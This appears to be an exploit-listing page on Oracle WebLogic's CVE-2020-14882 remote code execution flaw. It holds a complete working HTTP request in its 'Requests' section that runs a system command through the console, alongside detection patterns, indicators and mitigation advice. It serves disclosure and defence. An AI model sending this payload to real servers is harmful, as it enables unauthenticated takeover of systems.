Exploit for CVE-2020-14882

Name: Exploit for CVE-2020-14882
Rating: 5 (212 reviews)
2025-10-29 | CVSS 10.0
## https://sploitus.com/exploit?id=F60F47DE-0A09-59E0-B958-8DA532E06CA9
# 🌐 **CVE-2020-14882 — Oracle WebLogic Server Remote Code Execution**

---

### 🧩 Overview



**CVE-2020-14882** is a **critical unauthenticated Remote Code Execution (RCE)** vulnerability in **Oracle WebLogic Server’s Administration Console**.
An attacker can exploit it remotely — without any login credentials — using a specially crafted HTTP request to gain full control of the server.

* **Vendor:** Oracle
* **Component:** WebLogic Server Console
* **CVSS v3.1 Score:** 9.8 (Critical)
* **Disclosure Date:** October 2020
* **Attack Vector:** Network (HTTP request)
* **Authentication Required:** None

---

### ⚙️ Requests 

```
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128

_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");
```










---

### ⚙️ Affected Versions

The following WebLogic Server versions are known to be vulnerable:

* 10.3.6.0.0
* 12.1.3.0.0
* 12.2.1.3.0
* 12.2.1.4.0
* 14.1.1.0.0

(Other patch levels or customized builds may also be at risk if not updated.)

---

### 🧠 Root Cause & Technical Details

The flaw lies in the **WebLogic Administration Console**’s improper input validation.
By sending a **specially crafted URL** with **double URL encoding**, an attacker can **bypass authentication and access internal server functions**.

Typical exploit path example:

```
/console/css/%252e%252e%252fconsole.portal
```

Here `%252e%252e%252f` represents a **double-encoded directory traversal sequence**, allowing the attacker to escape the normal path and reach sensitive console code.
Once accessed, this can trigger remote command execution or webshell upload.

---

### 💣 Impact

* **Full remote code execution** with the privileges of the WebLogic process.
* **No authentication** required.
* **Complete system compromise** possible — attackers can deploy malware, steal data, or pivot deeper into the network.

Common exploitation results:

* Deployment of JSP-based **webshells**
* **Cryptomining** or **ransomware** installation
* **Persistence mechanisms** added to compromised systems

---

### 🕓 Timeline of Events

* **October 2020:** Oracle releases a Critical Patch Update addressing CVE-2020-14882.
* **Within days:** Public proof-of-concept (PoC) exploits appear online.
* **Following weeks:** Massive wave of exploitation observed — attackers scanning and exploiting exposed WebLogic servers globally.
* **Subsequent months:** Used in several major attack campaigns (cryptominers, ransomware, espionage).

---

### 🔍 Detection & Indicators of Compromise

**1. Access Logs**
Look for suspicious HTTP requests containing encoded traversal sequences such as:

```
%252e%252e%252fconsole
```

or

```
/console/css/.../console.portal
```

**2. File System Changes**

* Unrecognized `.jsp` files appearing under application directories.
* New or altered `.war` deployments.

**3. Process Activity**

* The WebLogic `java` process spawning shell commands (`/bin/sh`, `cmd.exe`).
* Unexpected outbound network connections from the WebLogic host.

**4. Persistence Artifacts**

* Suspicious scheduled tasks or startup scripts.
* Communication with mining pools or command-and-control servers.

---

### 🛡️ Mitigation & Remediation

**Immediate Actions:**

1. **Patch Immediately** — Apply Oracle’s October 2020 Critical Patch Update or later cumulative patches.
2. **Restrict Access** — Limit WebLogic Console access to trusted IPs or management networks only.
3. **Block Exploits** — Use a WAF or proxy rule to block requests containing encoded traversal patterns such as `%252e%252e%252f`.
4. **Disable Console** if not required in production.

**If Compromise Is Suspected:**

* Isolate the affected system from the network.
* Search logs and file systems for IOCs mentioned above.
* Rebuild the system from a known-good image.
* Rotate credentials and check for lateral movement.

---

### 🧰 Example Detection Pattern

Regular expression for scanning logs:

```
%25(2e|2E){2}%25(2f|2F)
```

This captures **double-encoded “../” traversal** attempts often used in CVE-2020-14882 exploits.

---

### 🧱 Defense-in-Depth Recommendations

* **Patch Management:** Keep WebLogic up to date and test patches before deployment.
* **Segmentation:** Keep administrative consoles off public networks.
* **Monitoring:** Enable detailed logging and feed data to your SIEM.
* **Incident Response Plan:** Prepare automated alerts for abnormal console access patterns.

---

### 🚨 Why It’s Important

CVE-2020-14882 remains a textbook example of a **critical enterprise RCE** — easy to exploit, devastating in impact, and widely weaponized.
It underscores the need for **prompt patching**, **network isolation of management interfaces**, and **continuous monitoring** for exploitation attempts.

---